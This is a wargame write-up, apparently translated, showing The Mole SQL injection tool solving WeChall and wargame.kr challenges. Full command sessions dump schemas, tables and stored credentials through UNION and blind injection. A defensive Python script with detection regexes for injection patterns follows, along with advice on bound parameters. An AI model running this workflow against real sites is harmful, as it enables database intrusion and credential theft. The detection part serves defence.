I came across a tool for SQL injection, so I'm writing up a short usage report.
The Mole (Digging up your data) : http://themole.nasel.com.ar/
As the target, I'll use this tool to solve the WeChall challenge that asks you to find the table names.
After starting it, pressing the Tab key shows that many options can be configured.
With options this varied, it looks like it can be used very broadly.
C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
 _____ _           ___  ___      _
|_   _| |          |  \/  |     | |
  | | | |__   ___  | .  . | ___ | | ___
  | | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
  | | | | | |  __/ | |  | | (_) | |  __/
  \_/ |_| |_|\___| \_|  |_/\___/|_|\___|
Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!
#> url http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login
#> needle Welcome
#> injectable_field GET username
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[+] Found separator: "'"
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 3
[+] Trying finger 1/2
[+] Injectable fields found: [1, 3]
[i] Trying to inject in field 1
[+] Found injectable field: 1
[+] Using string union technique.
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------------+
|     Databases      |
+--------------------+
| gizmore_tableu61   |
| information_schema |
+--------------------+
#> tables gizmore_tableu61
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------+
|    Tables    |
+--------------+
| aaawrong     |
| usertableus4 |
+--------------+
#> columns gizmore_tableu61 aaawrong
[+] Rows: 2
[*] Dumped 2/2 rows.
+----------------------------+
| Columns for table aaawrong |
+----------------------------+
| test                       |
| username                   |
+----------------------------+
#> query gizmore_tableu61 aaawrong test,username
+-----------------+
| test | username |
+-----------------+
+-----------------+
#> columns gizmore_tableu61 usertableus4
[+] Rows: 3
[*] Dumped 3/3 rows.
+--------------------------------+
| Columns for table usertableus4 |
+--------------------------------+
| message                        |
| password                       |
| username                       |
+--------------------------------+
#> query gizmore_tableu61 usertableus4 message,password,username
[+] Rows: 5
[*] Dumped 5/5 rows.
+------------------------------------------------------------------------------------------+
| message | password | username |
+------------------------------------------------------------------------------------------+
| Hello Peter><thismypass><Aaron A. Aaronson |
| Let`s have a bbq!><tamethepenguin><quangntenemy |
| This is a demo account, nothing here.><test><test |
| WTF><tables><nancy |
| Welcome Back><themoreyouknowthemoreyoucanforget><Admin |
+------------------------------------------------------------------------------------------+
#>
While I'm at it, let me also try a wargame.kr challenge. This one requires the parameters to be sent via POST.
C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
 _____ _           ___  ___      _
|_   _| |          |  \/  |     | |
  | | | |__   ___  | .  . | ___ | | ___
  | | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
  | | | | | |  __/ | |  | | (_) | |  __/
  \_/ |_| |_|\___| \_|  |_/\___/|_|\___|
Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!
#> url http://wargame.kr:8084/prob/9/chk.php
#> method POST idx=1532
#> needle 2011-12-12 18:24:17
#> injectable_field POST idx
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[i] Trying separator: """
[i] Trying separator: " "
[+] Found separator: " "
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 1
[+] Trying finger 1/2
[+] Trying finger 2/2
[-] Could not find injectable field.
[+] Using blind mode.
[+] Found row count: 2
[+] Guessed length: 18
information_schema
[+] Guessed length: 11
p9_blueh4g3
+--------------------+
|     Databases      |
+--------------------+
| information_schema |
| p9_blueh4g3        |
+--------------------+
#> tables p9_blueh4g3
[+] Found row count: 2
[+] Guessed length: 11
admin_table
[+] Guessed length: 8
ip_table
+-------------+
|   Tables    |
+-------------+
| admin_table |
| ip_table    |
+-------------+
#> columns p9_blueh4g3 admin_table
[+] Found row count: 3
[+] Guessed length: 3
idx
[+] Guessed length: 2
id
[+] Guessed length: 2
ps
+-------------------------------+
| Columns for table admin_table |
+-------------------------------+
| id                            |
| idx                           |
| ps                            |
+-------------------------------+
#> query p9_blueh4g3 admin_table id,idx,ps
[+] Found row count: 1
[+] Guessed length: 25
blue_admin><1><0h~myp4ss!
+-------------------------------+
|     id     | idx |     ps     |
+-------------------------------+
| blue_admin |  1  | 0h~myp4ss! |
+-------------------------------+
#>
A seriously impressive tool.
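The two sessions above show the same tool in its two modes: on WeChall it finds a quote separator and a # comment delimiter and dumps with UNION SELECT, on wargame.kr it finds only a bare-space separator and falls back to blind mode, guessing rows one length and character at a time. Seen from the server side those stages leave different footprints, and the following Python triage script is an added example written from the defender's side; it is not code from The Mole or from the original post. It assumes request records of (client, method, path, body) such as a reverse proxy or WAF would log, the regexes and the threshold of 20 are choices made for this example, and the sample traffic is constructed (documentation-range addresses, invented values).

```python
"""Detection logic for the injection probing shown in the two sessions above.

Added example for this write-up; it is not code from The Mole or from the
original post. It works on constructed request records (client, method,
path, body) of the kind a reverse proxy or WAF log would hold, and it
reproduces two patterns visible in the tool output:
  * a content stage: separators (' or "), a comment delimiter (#), UNION
    SELECT and information_schema inside a decoded parameter value;
  * a volume stage: blind mode, where one client sends many requests to
    one endpoint that differ only in the value of a single parameter.
The regexes and the threshold are this example's own assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
import re
from urllib.parse import parse_qsl, unquote_plus

# Content indicators, derived from what the sessions show the tool doing.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "comment_delimiter": re.compile(r"(#|--\s|/\*)"),
    "quote_breakout": re.compile(r"['\"]\s*(or|and|union)\b", re.I),
}


@dataclass(frozen=True)
class Request:
    client: str
    method: str
    path: str       # request path with query string, as logged
    body: str = ""  # form-encoded POST body, if the log captures it


def decode_params(req):
    """(name, value) pairs from query string and body, URL-decoded.

    parse_qsl decodes once; unquote_plus decodes a second time so that a
    double-encoded payload is still inspected in clear text.
    """
    pairs = []
    if "?" in req.path:
        pairs += parse_qsl(req.path.split("?", 1)[1], keep_blank_values=True)
    if req.body:
        pairs += parse_qsl(req.body, keep_blank_values=True)
    return [(k, unquote_plus(v)) for k, v in pairs]


def match_indicators(req):
    """Set of indicator names found in any decoded parameter of one request."""
    found = set()
    for _, value in decode_params(req):
        for name, rx in INDICATORS.items():
            if rx.search(value):
                found.add(name)
    return found


def blind_mode_candidates(requests, threshold=20):
    """(client, endpoint, parameter) triples whose value varied at least
    `threshold` times: the footprint of blind mode, which the content
    indicators miss when the separator is a bare space (numeric context).
    """
    seen = defaultdict(set)
    for req in requests:
        endpoint = req.path.split("?", 1)[0]
        for name, value in decode_params(req):
            seen[(req.client, endpoint, name)].add(value)
    return {key for key, values in seen.items() if len(values) >= threshold}


# Constructed sample traffic (documentation-range addresses, invented values).
LOGIN = "/challenge/table_names/challenge.php"
SAMPLE_REQUESTS = [
    # union-stage probe: username=test' UNION SELECT 1,2,3#
    Request("198.51.100.7", "GET",
            LOGIN + "?username=test%27+UNION+SELECT+1%2C2%2C3%23&password=test&login=login"),
    # ordinary login with an apostrophe in the name: must not be flagged
    Request("203.0.113.9", "GET",
            LOGIN + "?username=o%27neil&password=hunter2&login=login"),
    # ordinary POST to the wargame endpoint from a second client
    Request("203.0.113.9", "POST", "/prob/9/chk.php", body="idx=1532"),
] + [
    # blind-mode footprint: 25 POSTs in which only the idx suffix changes
    # (real blind payloads are not reproduced; "probeN" stands in for them)
    Request("198.51.100.7", "POST", "/prob/9/chk.php", body=f"idx=1532+probe{i}")
    for i in range(25)
]


def report(requests, threshold=20):
    """Per-request indicator hits plus blind-mode candidates, for a quick triage."""
    hits = [(r.client, r.method, r.path.split("?", 1)[0], sorted(match_indicators(r)))
            for r in requests if match_indicators(r)]
    return {"indicator_hits": hits,
            "blind_mode": sorted(blind_mode_candidates(requests, threshold))}


if __name__ == "__main__":
    result = report(SAMPLE_REQUESTS)
    for line in result["indicator_hits"]:
        print("indicators:", line)
    for key in result["blind_mode"]:
        print("blind-mode candidate:", key)
```

The wargame.kr session is the instructive case: because the separator found there was a bare space, nothing in the injected value needs a quote or a comment marker, so the content indicators stay silent and only the per-parameter volume heuristic reacts. The threshold needs tuning per endpoint (a search box legitimately sees many distinct values), and none of this replaces the actual fix, which is issuing the database query with bound parameters instead of concatenating the username or idx value into SQL text.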